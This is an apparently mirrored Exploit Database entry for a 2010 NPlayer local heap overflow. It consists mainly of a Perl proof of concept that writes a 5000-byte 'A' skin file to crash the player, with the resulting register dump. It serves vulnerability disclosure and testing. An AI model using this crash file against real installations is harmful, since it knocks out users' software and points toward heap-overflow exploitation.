NPlayer – ‘.dat Skin’ Local Heap Overflow (PoC)

• Exploit Database
• 12 阅读

• 作者： Rehan Ahmed
  日期： 2010-01-13
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11133/

• #!/usr/bin/perl
  #Exploit Title:NPlayer (.dat Skin File) Local Heap Overflow PoC
  #Date:13/01/2010
  #Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
  #Tested On: WinXP SP2
  ########################################################################################
  ##EBX 41414141
  ##ESP 0012EF6C
  ##EBP 00DA50F8 ASCII "C:\Program Files\n.player\skins\crash.dat"
  ##ESI 0012EFD8
  ##EDI 014143F8
  ##EIP 7C90EAF0 ntdll.7C90EAF0
  #######################################################################################
  ########################################################################################
  my $boom="\x41" x 5000;
  my $file="crash.dat";
  open($FILE,">$file");
  print $FILE $boom;
  close($FILE);
  print "File Successfully Created\n";
  ########################################################################################